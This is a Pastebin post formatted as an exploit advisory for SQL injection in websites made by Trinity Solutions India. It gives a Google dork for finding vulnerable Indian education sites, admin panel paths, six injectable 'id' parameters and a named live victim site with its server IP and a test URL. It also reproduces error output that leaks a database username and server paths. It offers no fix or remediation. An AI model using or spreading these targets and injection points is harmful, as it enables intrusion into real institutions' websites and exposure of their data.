KingSkrupellos

Trinity Solutions India SQL Injection

Jan 8th, 2019
97
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.46 KB | None | 0 0
  1. ######################################################
  2.  
  3. # Exploit Title : Trinity Solutions India SQL Injection Vulnerability
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 08/01/2019
  7. # Vendor Homepage : trinitysolutions.in
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Google Dorks : intext:''Powered by Trinity Solutions'' site:edu.in
  12. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  13. Special Elements used in an SQL Command ('SQL Injection') ]
  14. CXSecurity Exploit Reference Link :
  15. cxsecurity.com/issue/WLB-2019010051
  16.  
  17. ######################################################
  18.  
  19. # Admin Panel Login Path :
  20. ************************
  21.  
  22. /ritcohm/admin/
  23. [PATH]/admin/
  24.  
  25. ######################################################
  26.  
  27. # SQL Injection Exploit :
  28. **********************
  29.  
  30. [PATH]/index.php?id=[SQL Injection]
  31.  
  32. [PATH]/admin/dbinfo.php?id=[SQL Injection]
  33.  
  34. [PATH]/admin/lib/getval.php?id=[SQL Injection]
  35.  
  36. [PATH]/facilities.php?id=[SQL Injection]
  37.  
  38. [PATH]/include/right_gallery.php?id=[SQL Injection]
  39.  
  40. [PATH]/include/footerfiles.php?id=[SQL Injection]
  41.  
  42. ######################################################
  43.  
  44. # Example Vulnerable Site =>
  45. **************************
  46.  
  47. Note => (166.62.10.139) => There are 1,479 domains hosted on this server.
  48.  
  49. [+] ritcohm.rit.edu.in/ritcohm/include/right_gallery.php?id=1%27 =>
  50.  
  51. [Proof of Concept] => archive.fo/OtUVd
  52.  
  53. ######################################################
  54.  
  55. # SQL Database Error :
  56. ***********************
  57.  
  58. Deprecated: mysql_query(): The mysql extension is deprecated and
  59. will be removed in the future: use mysqli or PDO instead in /home/newpanelritee
  60. /public_html/ritcohm/ritcohm/include/right_gallery.php on line 12
  61.  
  62. Warning: mysql_query(): Access denied for user 'newpanelritee'@'localhost'
  63. (using password: NO) in /home/newpanelritee/public_html
  64. /ritcohm/ritcohm/include/right_gallery.php on line 12
  65.  
  66. Warning: mysql_query(): A link to the server could not be established in
  67. /home/newpanelritee/public_html/ritcohm/ritcohm/include
  68. /right_gallery.php on line 12
  69.  
  70. Warning: mysql_fetch_array() expects parameter 1 to be resource,
  71. boolean given in /home/newpanelritee/public_html/ritcohm
  72. /ritcohm/include/right_gallery.php on line 13
  73.  
  74. ######################################################
  75.  
  76. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  77.  
  78. ######################################################
Add Comment
Please, Sign In to add comment